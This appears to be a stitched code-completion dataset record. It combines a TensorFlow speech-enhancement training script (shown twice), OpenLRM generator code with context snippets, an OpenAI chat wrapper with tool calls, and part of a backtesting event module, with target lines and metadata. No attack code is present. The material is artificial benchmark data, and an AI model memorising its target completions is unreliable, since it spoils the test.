tf.summary.scalar("weighted_sdr_loss", loss)
# MSE Loss
if additional_loss_input is not None:
frame_step = flags.stft_freq_samples - flags.noverlap - 2
stft_true = tf.contrib.signal.stft(y_true, frame_length=flags.stft_freq_samples, frame_step=frame_step)
mag_true = tf.abs(stft_true)
mag_loss = tf.reduce_mean(tf.abs(mag_true - additional_loss_input))
loss += mag_loss
tf.summary.scalar("mag_loss", mag_loss)
# Global Step and Learning Rate Decay
global_step = tf.train.get_or_create_global_step()
tf.summary.scalar("global_step", global_step)
starter_learning_rate = flags.learning_rate
end_learning_rate = flags.end_learning_rate
learning_rate = tf.train.polynomial_decay(starter_learning_rate, global_step,
flags.fs, end_learning_rate,
power=0.5)
tf.summary.scalar("learning_rate", learning_rate)
# Optimizer and Minimization
optim = tf.train.AdamOptimizer(learning_rate=learning_rate)
return optim.minimize(loss, global_step=global_step), loss
def get_train_data(flags):
"""
Get training and validation data.
Args:
flags: Flags object.
Returns:
Tuple containing iterator, training dataset, validation dataset, training size, and validation size.
"""
all_files = get_wav_files(flags.train_clean_dir)
train_files, valid_files = sklearn.model_selection.train_test_split(all_files, test_size=flags.validation_size, random_state=42)
train = lambda: audio_generator_complex(train_files, flags)
valid = lambda: audio_generator_complex(valid_files, flags)
with tf.name_scope('input'):
input_shape = tuple(np.array([None]))
output_shape = input_shape
train_images_tf = tf.data.Dataset.from_generator(train, (tf.float32, tf.float32), (input_shape, output_shape))
valid_images_tf = tf.data.Dataset.from_generator(valid, (tf.float32, tf.float32), (input_shape, output_shape))
train_images_tf = config_dataset(train_images_tf, flags)
valid_images_tf = config_dataset(valid_images_tf, flags)
iterator = tf.data.Iterator.from_structure(train_images_tf.output_types, train_images_tf.output_shapes)
# Get datasets sizes
train_size = sum(samples_per_file for _, _, samples_per_file in train())
valid_size = sum(samples_per_file for _, _, samples_per_file in valid())
return iterator, train_images_tf, valid_images_tf, train_size, valid_size
def save_loss(epoch_array, validation_accuracy, train_accuracy, path, train_loss_arr):
"""
Save loss information to files.
Args:
epoch_array: Array containing epoch numbers.
validation_accuracy: Validation accuracy values.
train_accuracy: Training accuracy values.
path: Path to save the files.
train_loss_arr: Training loss values.
"""
comb_ = np.asarray([epoch_array, validation_accuracy, train_accuracy])
np.savetxt(os.path.join(path, "loss.csv"), comb_, delimiter=",")
np.savetxt(os.path.join(path, "train_loss.csv"), train_loss_arr, delimiter=",")
def main():
# Initialize Flags object
flags = Flags()
# Clears the default graph stack and resets the global default graph
tf.reset_default_graph()
graph = tf.get_default_graph()
# Get training and validation data
iterator, train_images_tf, valid_images_tf, train_size, valid_size = get_train_data(flags)
n_batches_train = int(train_size // flags.batch_size)
n_batches_valid = int(valid_size // flags.batch_size)
# Define input placeholders and build the UNET model
X, y = iterator.get_next()
mode = tf.placeholder(tf.bool, name="mode")
pred, _, _ = make_asppunet_3D(X, mode, flags, features=flags.net_size, last_pad=True, mask=True)
additional_loss_input = None
print("Defined UNET")
# Build the training operation
with tf.name_scope('optimize'):
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_op, loss = make_train_op(X, pred, y, flags, additional_loss_input)
# Merge all summaries
summary_op = tf.summary.merge_all()
# Define checkpoint directory
|
def make_train_op(X, y_pred, y_true, flags, additional_loss_input):
"""
Create the training operation.
Args:
X: Input tensor.
y_pred: Predicted output tensor.
y_true: True output tensor.
flags: Flags object.
additional_loss_input: Additional loss input tensor.
Returns:
Tuple containing the training operation and the loss tensor.
"""
# Loss Calculation:
loss = weighted_sdr_loss(X, y_pred, y_true)
tf.summary.scalar("weighted_sdr_loss", loss)
# MSE Loss
if additional_loss_input is not None:
frame_step = flags.stft_freq_samples - flags.noverlap - 2
stft_true = tf.contrib.signal.stft(y_true, frame_length=flags.stft_freq_samples, frame_step=frame_step)
mag_true = tf.abs(stft_true)
mag_loss = tf.reduce_mean(tf.abs(mag_true - additional_loss_input))
loss += mag_loss
tf.summary.scalar("mag_loss", mag_loss)
# Global Step and Learning Rate Decay
global_step = tf.train.get_or_create_global_step()
tf.summary.scalar("global_step", global_step)
starter_learning_rate = flags.learning_rate
end_learning_rate = flags.end_learning_rate
learning_rate = tf.train.polynomial_decay(starter_learning_rate, global_step,
flags.fs, end_learning_rate,
power=0.5)
tf.summary.scalar("learning_rate", learning_rate)
# Optimizer and Minimization
optim = tf.train.AdamOptimizer(learning_rate=learning_rate)
return optim.minimize(loss, global_step=global_step), loss
def get_train_data(flags):
"""
Get training and validation data.
Args:
flags: Flags object.
Returns:
Tuple containing iterator, training dataset, validation dataset, training size, and validation size.
"""
all_files = get_wav_files(flags.train_clean_dir)
train_files, valid_files = sklearn.model_selection.train_test_split(all_files, test_size=flags.validation_size, random_state=42)
train = lambda: audio_generator_complex(train_files, flags)
valid = lambda: audio_generator_complex(valid_files, flags)
with tf.name_scope('input'):
input_shape = tuple(np.array([None]))
output_shape = input_shape
train_images_tf = tf.data.Dataset.from_generator(train, (tf.float32, tf.float32), (input_shape, output_shape))
valid_images_tf = tf.data.Dataset.from_generator(valid, (tf.float32, tf.float32), (input_shape, output_shape))
train_images_tf = config_dataset(train_images_tf, flags)
valid_images_tf = config_dataset(valid_images_tf, flags)
iterator = tf.data.Iterator.from_structure(train_images_tf.output_types, train_images_tf.output_shapes)
# Get datasets sizes
train_size = sum(samples_per_file for _, _, samples_per_file in train())
valid_size = sum(samples_per_file for _, _, samples_per_file in valid())
return iterator, train_images_tf, valid_images_tf, train_size, valid_size
def save_loss(epoch_array, validation_accuracy, train_accuracy, path, train_loss_arr):
"""
Save loss information to files.
Args:
epoch_array: Array containing epoch numbers.
validation_accuracy: Validation accuracy values.
train_accuracy: Training accuracy values.
path: Path to save the files.
train_loss_arr: Training loss values.
"""
comb_ = np.asarray([epoch_array, validation_accuracy, train_accuracy])
np.savetxt(os.path.join(path, "loss.csv"), comb_, delimiter=",")
np.savetxt(os.path.join(path, "train_loss.csv"), train_loss_arr, delimiter=",")
def main():
# Initialize Flags object
flags = Flags()
# Clears the default graph stack and resets the global default graph
tf.reset_default_graph()
graph = tf.get_default_graph()
# Get training and validation data
iterator, train_images_tf, valid_images_tf, train_size, valid_size = get_train_data(flags)
n_batches_train = int(train_size // flags.batch_size)
n_batches_valid = int(valid_size // flags.batch_size)
# Define input placeholders and build the UNET model
X, y = iterator.get_next()
mode = tf.placeholder(tf.bool, name="mode")
pred, _, _ = make_asppunet_3D(X, mode, flags, features=flags.net_size, last_pad=True, mask=True)
additional_loss_input = None
print("Defined UNET")
# Build the training operation
with tf.name_scope('optimize'):
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_op, loss = make_train_op(X, pred, y, flags, additional_loss_input)
# Merge all summaries
summary_op = tf.summary.merge_all()
# Define checkpoint directory | checkpoint_dir = os.path.join(flags.ckdir, str(get_graph_size())[:3] + '_' + str(time.time())) | 3 | 2023-12-20 19:58:18+00:00 | 4k |
camenduru/OpenLRM-hf | lrm/models/generator.py | [
{
"identifier": "DinoWrapper",
"path": "lrm/models/encoders/dino_wrapper.py",
"snippet": "class DinoWrapper(nn.Module):\n \"\"\"\n Dino v1 wrapper using huggingface transformer implementation.\n \"\"\"\n def __init__(self, model_name: str, freeze: bool = True):\n super().__init__()\n self.model, self.processor = self._build_dino(model_name)\n if freeze:\n self._freeze()\n\n def forward(self, image):\n # image: [N, C, H, W], on cpu\n # RGB image with [0,1] scale and properly sized\n inputs = self.processor(images=image, return_tensors=\"pt\", do_rescale=False, do_resize=False).to(self.model.device)\n # This resampling of positional embedding uses bicubic interpolation\n outputs = self.model(**inputs, interpolate_pos_encoding=True)\n last_hidden_states = outputs.last_hidden_state\n return last_hidden_states\n\n def _freeze(self):\n print(f\"======== Freezing DinoWrapper ========\")\n self.model.eval()\n for name, param in self.model.named_parameters():\n param.requires_grad = False\n\n @staticmethod\n def _build_dino(model_name: str, proxy_error_retries: int = 3, proxy_error_cooldown: int = 5):\n import requests\n try:\n model = ViTModel.from_pretrained(model_name, add_pooling_layer=False)\n processor = ViTImageProcessor.from_pretrained(model_name)\n return model, processor\n except requests.exceptions.ProxyError as err:\n if proxy_error_retries > 0:\n print(f\"Huggingface ProxyError: Retrying in {proxy_error_cooldown} seconds...\")\n import time\n time.sleep(proxy_error_cooldown)\n return DinoWrapper._build_dino(model_name, proxy_error_retries - 1, proxy_error_cooldown)\n else:\n raise err"
},
{
"identifier": "TriplaneTransformer",
"path": "lrm/models/transformer.py",
"snippet": "class TriplaneTransformer(nn.Module):\n \"\"\"\n Transformer with condition and modulation that generates a triplane representation.\n \n Reference:\n Timm: https://github.com/huggingface/pytorch-image-models/blob/main/timm/models/vision_transformer.py#L486\n \"\"\"\n def __init__(self, inner_dim: int, image_feat_dim: int, camera_embed_dim: int,\n triplane_low_res: int, triplane_high_res: int, triplane_dim: int,\n num_layers: int, num_heads: int,\n eps: float = 1e-6):\n super().__init__()\n\n # attributes\n self.triplane_low_res = triplane_low_res\n self.triplane_high_res = triplane_high_res\n self.triplane_dim = triplane_dim\n\n # modules\n # initialize pos_embed with 1/sqrt(dim) * N(0, 1)\n self.pos_embed = nn.Parameter(torch.randn(1, 3*triplane_low_res**2, inner_dim) * (1. / inner_dim) ** 0.5)\n self.layers = nn.ModuleList([\n ConditionModulationBlock(\n inner_dim=inner_dim, cond_dim=image_feat_dim, mod_dim=camera_embed_dim, num_heads=num_heads, eps=eps)\n for _ in range(num_layers)\n ])\n self.norm = nn.LayerNorm(inner_dim, eps=eps)\n self.deconv = nn.ConvTranspose2d(inner_dim, triplane_dim, kernel_size=2, stride=2, padding=0)\n\n def forward(self, image_feats, camera_embeddings):\n # image_feats: [N, L_cond, D_cond]\n # camera_embeddings: [N, D_mod]\n\n assert image_feats.shape[0] == camera_embeddings.shape[0], \\\n f\"Mismatched batch size: {image_feats.shape[0]} vs {camera_embeddings.shape[0]}\"\n\n N = image_feats.shape[0]\n H = W = self.triplane_low_res\n L = 3 * H * W\n\n x = self.pos_embed.repeat(N, 1, 1) # [N, L, D]\n for layer in self.layers:\n x = layer(x, image_feats, camera_embeddings)\n x = self.norm(x)\n\n # separate each plane and apply deconv\n x = x.view(N, 3, H, W, -1)\n x = torch.einsum('nihwd->indhw', x) # [3, N, D, H, W]\n x = x.contiguous().view(3*N, -1, H, W) # [3*N, D, H, W]\n x = self.deconv(x) # [3*N, D', H', W']\n x = x.view(3, N, *x.shape[-3:]) # [3, N, D', H', W']\n x = torch.einsum('indhw->nidhw', x) # [N, 3, D', H', W']\n x = x.contiguous()\n\n assert self.triplane_high_res == x.shape[-2], \\\n f\"Output triplane resolution does not match with expected: {x.shape[-2]} vs {self.triplane_high_res}\"\n assert self.triplane_dim == x.shape[-3], \\\n f\"Output triplane dimension does not match with expected: {x.shape[-3]} vs {self.triplane_dim}\"\n\n return x"
},
{
"identifier": "TriplaneSynthesizer",
"path": "lrm/models/rendering/synthesizer.py",
"snippet": "class TriplaneSynthesizer(nn.Module):\n \"\"\"\n Synthesizer that renders a triplane volume with planes and a camera.\n \n Reference:\n EG3D: https://github.com/NVlabs/eg3d/blob/main/eg3d/training/triplane.py#L19\n \"\"\"\n\n DEFAULT_RENDERING_KWARGS = {\n 'ray_start': 'auto',\n 'ray_end': 'auto',\n 'box_warp': 2.,\n 'white_back': True,\n 'disparity_space_sampling': False,\n 'clamp_mode': 'softplus',\n 'sampler_bbox_min': -1.,\n 'sampler_bbox_max': 1.,\n }\n\n def __init__(self, triplane_dim: int, samples_per_ray: int):\n super().__init__()\n\n # attributes\n self.triplane_dim = triplane_dim\n self.rendering_kwargs = {\n **self.DEFAULT_RENDERING_KWARGS,\n 'depth_resolution': samples_per_ray // 2,\n 'depth_resolution_importance': samples_per_ray // 2,\n }\n\n # renderings\n self.renderer = ImportanceRenderer()\n self.ray_sampler = RaySampler()\n\n # modules\n self.decoder = OSGDecoder(n_features=triplane_dim)\n\n def forward(self, planes, cameras, render_size: int):\n # planes: (N, 3, D', H', W')\n # cameras: (N, M, D_cam)\n # render_size: int\n assert planes.shape[0] == cameras.shape[0], \"Batch size mismatch for planes and cameras\"\n N, M = cameras.shape[:2]\n \n cam2world_matrix = cameras[..., :16].view(N, M, 4, 4)\n intrinsics = cameras[..., 16:25].view(N, M, 3, 3)\n\n # Create a batch of rays for volume rendering\n ray_origins, ray_directions = self.ray_sampler(\n cam2world_matrix=cam2world_matrix.reshape(-1, 4, 4),\n intrinsics=intrinsics.reshape(-1, 3, 3),\n render_size=render_size,\n )\n assert N*M == ray_origins.shape[0], \"Batch size mismatch for ray_origins\"\n assert ray_origins.dim() == 3, \"ray_origins should be 3-dimensional\"\n\n # Perform volume rendering\n rgb_samples, depth_samples, weights_samples = self.renderer(\n planes.repeat_interleave(M, dim=0), self.decoder, ray_origins, ray_directions, self.rendering_kwargs,\n )\n\n # Reshape into 'raw' neural-rendered image\n Himg = Wimg = render_size\n rgb_images = rgb_samples.permute(0, 2, 1).reshape(N, M, rgb_samples.shape[-1], Himg, Wimg).contiguous()\n depth_images = depth_samples.permute(0, 2, 1).reshape(N, M, 1, Himg, Wimg)\n weight_images = weights_samples.permute(0, 2, 1).reshape(N, M, 1, Himg, Wimg)\n\n return {\n 'images_rgb': rgb_images,\n 'images_depth': depth_images,\n 'images_weight': weight_images,\n }\n\n def forward_grid(self, planes, grid_size: int, aabb: torch.Tensor = None):\n # planes: (N, 3, D', H', W')\n # grid_size: int\n # aabb: (N, 2, 3)\n if aabb is None:\n aabb = torch.tensor([\n [self.rendering_kwargs['sampler_bbox_min']] * 3,\n [self.rendering_kwargs['sampler_bbox_max']] * 3,\n ], device=planes.device, dtype=planes.dtype).unsqueeze(0).repeat(planes.shape[0], 1, 1)\n assert planes.shape[0] == aabb.shape[0], \"Batch size mismatch for planes and aabb\"\n N = planes.shape[0]\n\n # create grid points for triplane query\n grid_points = []\n for i in range(N):\n grid_points.append(torch.stack(torch.meshgrid(\n torch.linspace(aabb[i, 0, 0], aabb[i, 1, 0], grid_size, device=planes.device),\n torch.linspace(aabb[i, 0, 1], aabb[i, 1, 1], grid_size, device=planes.device),\n torch.linspace(aabb[i, 0, 2], aabb[i, 1, 2], grid_size, device=planes.device),\n indexing='ij',\n ), dim=-1).reshape(-1, 3))\n cube_grid = torch.stack(grid_points, dim=0).to(planes.device)\n\n features = self.forward_points(planes, cube_grid)\n\n # reshape into grid\n features = {\n k: v.reshape(N, grid_size, grid_size, grid_size, -1)\n for k, v in features.items()\n }\n return features\n\n def forward_points(self, planes, points: torch.Tensor, chunk_size: int = 2**20):\n # planes: (N, 3, D', H', W')\n # points: (N, P, 3)\n N, P = points.shape[:2]\n\n # query triplane in chunks\n outs = []\n for i in range(0, points.shape[1], chunk_size):\n chunk_points = points[:, i:i+chunk_size]\n\n # query triplane\n chunk_out = self.renderer.run_model_activated(\n planes=planes,\n decoder=self.decoder,\n sample_coordinates=chunk_points,\n sample_directions=torch.zeros_like(chunk_points),\n options=self.rendering_kwargs,\n )\n outs.append(chunk_out)\n\n # concatenate the outputs\n point_features = {\n k: torch.cat([out[k] for out in outs], dim=1)\n for k in outs[0].keys()\n }\n return point_features"
}
] | import torch.nn as nn
from .encoders.dino_wrapper import DinoWrapper
from .transformer import TriplaneTransformer
from .rendering.synthesizer import TriplaneSynthesizer | 3,305 | # Copyright (c) 2023, Zexin He
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class CameraEmbedder(nn.Module):
"""
Embed camera features to a high-dimensional vector.
Reference:
DiT: https://github.com/facebookresearch/DiT/blob/main/models.py#L27
"""
def __init__(self, raw_dim: int, embed_dim: int):
super().__init__()
self.mlp = nn.Sequential(
nn.Linear(raw_dim, embed_dim),
nn.SiLU(),
nn.Linear(embed_dim, embed_dim),
)
def forward(self, x):
return self.mlp(x)
class LRMGenerator(nn.Module):
"""
Full model of the large reconstruction model.
"""
def __init__(self, camera_embed_dim: int, rendering_samples_per_ray: int,
transformer_dim: int, transformer_layers: int, transformer_heads: int,
triplane_low_res: int, triplane_high_res: int, triplane_dim: int,
encoder_freeze: bool = True, encoder_model_name: str = 'facebook/dino-vitb16', encoder_feat_dim: int = 768):
super().__init__()
# attributes
self.encoder_feat_dim = encoder_feat_dim
self.camera_embed_dim = camera_embed_dim
# modules
self.encoder = DinoWrapper(
model_name=encoder_model_name,
freeze=encoder_freeze,
)
self.camera_embedder = CameraEmbedder(
raw_dim=12+4, embed_dim=camera_embed_dim,
)
self.transformer = TriplaneTransformer(
inner_dim=transformer_dim, num_layers=transformer_layers, num_heads=transformer_heads,
image_feat_dim=encoder_feat_dim,
camera_embed_dim=camera_embed_dim,
triplane_low_res=triplane_low_res, triplane_high_res=triplane_high_res, triplane_dim=triplane_dim,
)
| # Copyright (c) 2023, Zexin He
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class CameraEmbedder(nn.Module):
"""
Embed camera features to a high-dimensional vector.
Reference:
DiT: https://github.com/facebookresearch/DiT/blob/main/models.py#L27
"""
def __init__(self, raw_dim: int, embed_dim: int):
super().__init__()
self.mlp = nn.Sequential(
nn.Linear(raw_dim, embed_dim),
nn.SiLU(),
nn.Linear(embed_dim, embed_dim),
)
def forward(self, x):
return self.mlp(x)
class LRMGenerator(nn.Module):
"""
Full model of the large reconstruction model.
"""
def __init__(self, camera_embed_dim: int, rendering_samples_per_ray: int,
transformer_dim: int, transformer_layers: int, transformer_heads: int,
triplane_low_res: int, triplane_high_res: int, triplane_dim: int,
encoder_freeze: bool = True, encoder_model_name: str = 'facebook/dino-vitb16', encoder_feat_dim: int = 768):
super().__init__()
# attributes
self.encoder_feat_dim = encoder_feat_dim
self.camera_embed_dim = camera_embed_dim
# modules
self.encoder = DinoWrapper(
model_name=encoder_model_name,
freeze=encoder_freeze,
)
self.camera_embedder = CameraEmbedder(
raw_dim=12+4, embed_dim=camera_embed_dim,
)
self.transformer = TriplaneTransformer(
inner_dim=transformer_dim, num_layers=transformer_layers, num_heads=transformer_heads,
image_feat_dim=encoder_feat_dim,
camera_embed_dim=camera_embed_dim,
triplane_low_res=triplane_low_res, triplane_high_res=triplane_high_res, triplane_dim=triplane_dim,
) | self.synthesizer = TriplaneSynthesizer( | 2 | 2023-12-21 16:30:19+00:00 | 4k |
garinops/chat-E-AI | ai/openai/chat.py | [
{
"identifier": "OpenAITools",
"path": "ai/openai/tools/tools.py",
"snippet": "class OpenAITools:\n\n @staticmethod\n def get_tools() -> list:\n tools = []\n for tool_config in OPENAI_TOOLS_CONFIG:\n if tool_config[\"enable\"]:\n tool_class = tool_config[\"Tool\"]\n tools.append(tool_class.TOOL_MODEL)\n return tools\n\n @staticmethod\n def handle(name_tool_call: str, parameter_variables) -> ResponseBase:\n \"\"\"1、处理路由OpenAI响应的function.name决定。\"\"\"\n \"\"\"2、工具函数参数及变量值也是由OpenAI响应决定,需要具体工具具体相应处理。\"\"\"\n match name_tool_call:\n # 1.宏微观经济数据、行业数据、消费品市场价格数据工具-处理\n case ToolWwwGarinassetCom.get_indicator_overview.__name__:\n region = parameter_variables.get(\"region\")\n name = parameter_variables.get(\"name\")\n toolResponse = ToolWwwGarinassetCom.get_indicator_overview(region=region, name=name)\n return toolResponse\n # 2.天气工具-处理\n case ToolWttrIn.get_weather.__name__:\n location = parameter_variables.get(\"location\")\n toolResponse = ToolWttrIn.get_weather(location=location)\n return toolResponse\n # 3.时间工具-处理\n case ToolTime.get_time.__name__:\n location = parameter_variables.get(\"location\")\n offset_hours = parameter_variables.get(\"offset_hours\")\n toolResponse = ToolTime.get_time(location=location, offset_hours=offset_hours)\n return toolResponse\n # 4.股票信息-处理\n case ToolXueqiuCom.get_stock.__name__:\n name = parameter_variables.get(\"name\")\n symbol = parameter_variables.get(\"symbol\")\n toolResponse = ToolXueqiuCom.get_stock(name=name, symbol=symbol)\n return toolResponse"
},
{
"identifier": "OpenAIUtilsKey",
"path": "ai/openai/utils/key.py",
"snippet": "class OpenAIUtilsKey:\n\n @staticmethod\n def get_key_in_config():\n _list_keys = OPENAI_API_KEYS\n if not _list_keys:\n loggerOpenAI.error(\"The OpenAI Key Configure Item Were Not Found in The Configuration File.\")\n else:\n if len(_list_keys) == 1 and _list_keys[0] == \"\":\n loggerOpenAI.error(\"The OpenAI Key Has Not Been Configured in The Configuration File.\")\n else:\n return random.choice(_list_keys)\n return\n\n @staticmethod\n def get_key_in_env():\n api_keys = os.environ.get('OPENAI_API_KEYS')\n\n if not api_keys:\n return None\n\n _list_keys = api_keys.split(\",\")\n _list_keys = [key.strip() for key in _list_keys if key.strip()]\n\n if not _list_keys:\n return None\n\n return random.choice(_list_keys)"
},
{
"identifier": "LogUtils",
"path": "common/log.py",
"snippet": "class LogUtils:\n\n @staticmethod\n def new_logger(component_name):\n _logger = logging.getLogger(component_name)\n _is_logger_exist = len(_logger.handlers) > 0\n if _is_logger_exist:\n return _logger\n else:\n _logger.setLevel(SYSTEM_LOG_LEVEL)\n _formatter = logging.Formatter('%(asctime)s - %(levelname)s - [{}] - %(message)s'.format(component_name))\n _console_handler = logging.StreamHandler()\n _console_handler.setLevel(SYSTEM_LOG_LEVEL)\n _console_handler.setFormatter(_formatter)\n _logger.addHandler(_console_handler)\n return _logger"
},
{
"identifier": "OPENAI_MODEL_DICTS",
"path": "config/settings.py",
"snippet": "OPENAI_MODEL_DICTS = MODEL_DICTS_OPENAI[\"gpt-3.5-turbo-1106\"]"
},
{
"identifier": "OPENAI_SYSTEM_CONTENT",
"path": "config/settings.py",
"snippet": "OPENAI_SYSTEM_CONTENT = '你是ChatGPT, 一个由OpenAI训练的大型语言模型, 你旨在回答并解决人们的任何问题,并且可以使用多种语言与人交流。'"
},
{
"identifier": "OPENAI_API_RATE_LIMITS",
"path": "config/settings.py",
"snippet": "OPENAI_API_RATE_LIMITS = 3"
},
{
"identifier": "OPENAI_BASE_URL",
"path": "config/settings.py",
"snippet": "OPENAI_BASE_URL = \"\""
},
{
"identifier": "ResponseAI",
"path": "models/response.py",
"snippet": "class ResponseAI(ResponseBase):\n aiCost: float\n aiCostCurrency: str"
},
{
"identifier": "UtilsCalculate",
"path": "utils/calculate.py",
"snippet": "class UtilsCalculate:\n\n @staticmethod\n def cal_token_cost(prompt_tokens, completion_tokens, model: dict) -> float:\n token_cost = ((prompt_tokens * model[\"PriceInput\"] + completion_tokens * model[\"PriceOutput\"]) / model[\"UnitPrice\"])\n return token_cost"
}
] | import json
import backoff as backoff
import openai
from collections import deque
from dotenv import load_dotenv
from openai import OpenAI
from ai.openai.tools.tools import OpenAITools
from ai.openai.utils.key import OpenAIUtilsKey
from common.log import LogUtils
from config.settings import OPENAI_MODEL_DICTS, OPENAI_SYSTEM_CONTENT, OPENAI_API_RATE_LIMITS, OPENAI_BASE_URL
from models.response import ResponseAI
from utils.calculate import UtilsCalculate | 1,755 |
# 加载 .env 文件
load_dotenv()
# 日志logger
loggerOpenAI = LogUtils.new_logger("openai-Chat")
loggerBackoff = LogUtils.new_logger("library-backoff")
class AIOpenAIChat:
def __init__(self):
# 创建一个客户端实例
self.client = OpenAI(
api_key=OpenAIUtilsKey.get_key_in_env() if OpenAIUtilsKey.get_key_in_env() else OpenAIUtilsKey.get_key_in_config(),
base_url=OPENAI_BASE_URL if OPENAI_BASE_URL else None
)
self.model = OPENAI_MODEL_DICTS["Name"]
self.msgSys = OPENAI_SYSTEM_CONTENT
self.msgSysChck = True
self.msgUserAssi = deque()
self.messages = []
self.tools = OpenAITools.get_tools()
self.responseAI = ResponseAI(
answer="",
source="OpenAI",
aiCost=0,
aiCostCurrency=OPENAI_MODEL_DICTS['UnitCurrency']
)
def __setattr__(self, name, value):
"""messageContentUserAssistant更新则更新messages"""
if name == "msgUserAssi":
messages_system = [{
"role": "system",
"content": self.msgSys
}]
self.messages = messages_system + list(value)
# 执行默认赋值操作
super().__setattr__(name, value)
# 调用
def response(self):
self.responseAI = ResponseAI(
answer="",
source="OpenAI",
aiCost=0,
aiCostCurrency=OPENAI_MODEL_DICTS['UnitCurrency']
)
"""捕获openai.RateLimitError,回退重试。"""
def _backoff_jitter(rate) -> float:
_jitter = (60 / OPENAI_API_RATE_LIMITS) if OPENAI_API_RATE_LIMITS!=0 else 0
return _jitter
@backoff.on_exception(backoff.expo,
openai.RateLimitError,
max_time=60,
jitter=_backoff_jitter,
raise_on_giveup=False,
logger=loggerBackoff)
def inner_function():
try:
response_chat_completion = self.client.chat.completions.create(
model=self.model,
messages=self.messages,
tools=self.tools,
tool_choice="auto"
)
# Cost模块
prompt_tokens = response_chat_completion.usage.prompt_tokens
completion_tokens = response_chat_completion.usage.completion_tokens
|
# 加载 .env 文件
load_dotenv()
# 日志logger
loggerOpenAI = LogUtils.new_logger("openai-Chat")
loggerBackoff = LogUtils.new_logger("library-backoff")
class AIOpenAIChat:
def __init__(self):
# 创建一个客户端实例
self.client = OpenAI(
api_key=OpenAIUtilsKey.get_key_in_env() if OpenAIUtilsKey.get_key_in_env() else OpenAIUtilsKey.get_key_in_config(),
base_url=OPENAI_BASE_URL if OPENAI_BASE_URL else None
)
self.model = OPENAI_MODEL_DICTS["Name"]
self.msgSys = OPENAI_SYSTEM_CONTENT
self.msgSysChck = True
self.msgUserAssi = deque()
self.messages = []
self.tools = OpenAITools.get_tools()
self.responseAI = ResponseAI(
answer="",
source="OpenAI",
aiCost=0,
aiCostCurrency=OPENAI_MODEL_DICTS['UnitCurrency']
)
def __setattr__(self, name, value):
"""messageContentUserAssistant更新则更新messages"""
if name == "msgUserAssi":
messages_system = [{
"role": "system",
"content": self.msgSys
}]
self.messages = messages_system + list(value)
# 执行默认赋值操作
super().__setattr__(name, value)
# 调用
def response(self):
self.responseAI = ResponseAI(
answer="",
source="OpenAI",
aiCost=0,
aiCostCurrency=OPENAI_MODEL_DICTS['UnitCurrency']
)
"""捕获openai.RateLimitError,回退重试。"""
def _backoff_jitter(rate) -> float:
_jitter = (60 / OPENAI_API_RATE_LIMITS) if OPENAI_API_RATE_LIMITS!=0 else 0
return _jitter
@backoff.on_exception(backoff.expo,
openai.RateLimitError,
max_time=60,
jitter=_backoff_jitter,
raise_on_giveup=False,
logger=loggerBackoff)
def inner_function():
try:
response_chat_completion = self.client.chat.completions.create(
model=self.model,
messages=self.messages,
tools=self.tools,
tool_choice="auto"
)
# Cost模块
prompt_tokens = response_chat_completion.usage.prompt_tokens
completion_tokens = response_chat_completion.usage.completion_tokens | self.responseAI.aiCost = self.responseAI.aiCost + UtilsCalculate.cal_token_cost( | 8 | 2023-12-16 17:02:13+00:00 | 4k |
ruudjuffermans/Event-Driven-Backtester | backtester/loop.py | [
{
"identifier": "MarketEvent",
"path": "backtester/events.py",
"snippet": "class MarketEvent(Event):\n \"\"\"\n Handles the event of receiving a new market update with corresponding bars.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initialises the MarketEvent.\n \"\"\"\n self.type = \"MARKET\""
},
{
"identifier": "SignalEvent",
"path": "backtester/events.py",
"snippet": "class SignalEvent(Event):\n \"\"\"\n Signal event generated from a particular strategy, if signal met strategy\n conditions\n\n Parameters:\n symbol - The symbol for current asset.\n datetime - A datetime at which the signal is generated.\n signal_type - The signal type ('LONG', 'SHORT', 'EXIT')\n strength - strength of the signal --> TODO: this should be given from a\n risk class when applying multiple strats\n \"\"\"\n\n def __init__(self, symbol, datetime, signal_type, strength):\n self.type = \"SIGNAL\"\n self.symbol = symbol\n self.datetime = datetime\n self.signal_type = signal_type\n self.strength = strength"
},
{
"identifier": "OrderEvent",
"path": "backtester/events.py",
"snippet": "class OrderEvent(Event):\n \"\"\"\n Order event to be sent to a broker api. It takes into account the quantity,\n type of ordering, and direction (long, short, exit...)\n\n Parameters:\n symbol - The symbol for current asset.\n order_type - Whether is it a 'MARKET' or 'LIMIT' order\n quantity --> TODO: this should be implemented in a risk class\n (Kelly Criterion, etc)\n direction - 1 or -1 based on the type\n \"\"\"\n\n def __init__(self, symbol, order_type, quantity, direction):\n self.type = \"ORDER\"\n self.symbol = symbol\n self.order_type = order_type\n self.quantity = quantity\n self.direction = direction\n\n def print_order(self):\n \"\"\"\n Outputs the values within the Order.\n \"\"\"\n print(\"Order: Symbol=%s, Type=%s, Quantity=%s, Direction=%s\") % (\n self.symbol,\n self.order_type,\n self.quantity,\n self.direction,\n )"
},
{
"identifier": "FillEvent",
"path": "backtester/events.py",
